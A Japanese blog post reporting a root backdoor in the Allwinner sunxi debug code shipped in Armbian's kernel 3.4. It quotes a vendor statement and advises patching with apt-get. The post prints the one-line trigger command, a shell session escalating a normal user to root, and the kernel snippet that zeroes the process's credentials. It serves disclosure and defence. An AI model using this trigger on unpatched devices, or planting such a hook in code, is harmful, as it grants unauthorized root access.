2
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 5 years have passed since last update.

Armbianのカーネル3.4で見つかったバックドアについて

Last updated at Posted at 2016-05-13

このバックドアがあると、どのプロセスでも、どのUIDでも/procにアクセス権さえあればecho "rootmydevice" > /proc/sunxi_debug/sunxi_debugというコマンドを実行することで、rootユーザーになれるようです。つまりネットワーク上に公開しているサービスで条件を満たしていれば、リモートからrootでコマンドを実行できる可能性があるということにもなります。確認方法はこちら(以下抜粋):

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)

問題のコードはこちら(以下抜粋):

        if(!strncmp("rootmydevice",(char*)buf,12)){
                cred = (struct cred *)__task_cred(current);
                cred->uid = 0;
                cred->gid = 0;
                cred->suid = 0;
                cred->euid = 0;
                cred->euid = 0;
                cred->egid = 0;
                cred->fsuid = 0;
                cred->fsgid = 0;
                printk("now you are root\n");
        }

このコードを作ったAllwinnerのコメントはこちら(以下抜粋):

Allwinner Technology committed to resolving Linux Kernel software issue

Zhuhai, China - Allwinner Technology.Co.Ltd (SHE: CN:300458) is working with its device manufacturers to fix a current software issue. We are aware that code, which was supplied to device manufacturers for the purpose of developing products, should have been removed prior to shipping. We recommend that anyone who is concerned about this issue should contact the relevant device manufacturer.

In relation to the source code on Github, it is released for the open source community only and not for shipping certain devices. Since a debugging function is not needed it has subsequently been removed.

Allwinner is committed to producing quality SoC’s with security a key priority. We are currently working hard to address this issue and revising our current processes so we can continue to evolve our range of SoC’s in the future.

apt-get update/upgradeで対応できるとのことなので、対応が必要な方はお早めに。

the fix is also in Armbian's apt repo so please upgrade now (apt-get update/upgrade or start with a fresh OS image) if you're affected!
-- Armbian - Security Alert for Allwinner sun8i (H3/A83T/H8)より

2
2
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
2
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?